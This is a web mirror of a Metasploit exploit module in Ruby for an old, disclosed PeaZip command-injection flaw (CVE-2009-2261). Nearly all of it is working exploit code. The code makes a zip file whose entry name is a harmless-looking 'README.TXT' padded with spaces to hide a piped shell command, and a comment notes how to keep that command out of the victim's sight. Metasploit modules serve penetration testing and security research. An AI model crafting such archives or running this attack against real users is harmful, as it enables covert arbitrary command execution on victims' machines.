Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/fileformat/peazip_command_injection.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'rex/zip'

7


8
class MetasploitModule < Msf::Exploit::Remote

9
  Rank = ExcellentRanking

10


11
  include Msf::Exploit::FILEFORMAT

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'PeaZip Zip Processing Command Injection',

18
        'Description' => %q{

19
          This module exploits a command injection vulnerability in PeaZip. All

20
          versions prior to 2.6.2 are suspected vulnerable. Testing was conducted with

21
          version 2.6.1 on Windows.

22


23
          In order for the command to be executed, an attacker must convince someone to

24
          open a specially crafted zip file with PeaZip, and access the specially file via

25
          double-clicking it. By doing so, an attacker can execute arbitrary commands

26
          as the victim user.

27
        },

28
        'License' => MSF_LICENSE,

29
        'Author' => [

30
          'pyrokinesis', # Of Nine:Situations:Group

31
          'jduck'

32
        ],

33
        'References' => [

34
          [ 'CVE', '2009-2261' ],

35
          [ 'OSVDB', '54966' ],

36
          [ 'URL', 'http://peazip.sourceforge.net/' ],

37
          [ 'EDB', '8881' ]

38
        ],

39
        'Platform' => %w{linux unix win},

40
        'Arch' => ARCH_CMD,

41
        'Payload' => {

42
          'Space' => 1024,

43
          'BadChars' => '',

44
          'DisableNops' => true,

45
          'Compat' =>

46
                        {

47
                          'PayloadType' => 'cmd',

48
                          'RequiredCmd' => 'generic perl telnet',

49
                        }

50
        },

51
        'Targets' => [

52
          ['Automatic', {}],

53
        ],

54
        'DisclosureDate' => '2009-06-05',

55
        'DefaultTarget' => 0,

56
        'Notes' => {

57
          'Reliability' => UNKNOWN_RELIABILITY,

58
          'Stability' => UNKNOWN_STABILITY,

59
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

60
        }

61
      )

62
    )

63


64
    register_options(

65
      [

66
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.zip']),

67
      ]

68
    )

69
  end

70


71
  def exploit

72
    # NOTE: using a command line containing / or \ will result in the command

73
    # being easily visible to the victim

74
    cmd = datastore['CMD']

75


76
    fname = "README.TXT"

77
    rest = "\"|#{cmd}|.txt"

78
    fname << " " * (255 - fname.length - rest.length)

79
    fname << rest

80


81
    content = rand_text_alphanumeric(rand(1024))

82


83
    zip = Rex::Zip::Archive.new

84
    zip.add_file(fname, content)

85


86
    # Create the file

87
    print_status("Creating '#{datastore['FILENAME']}' file...")

88


89
    file_create(zip.pack)

90
  end

91
end

92


93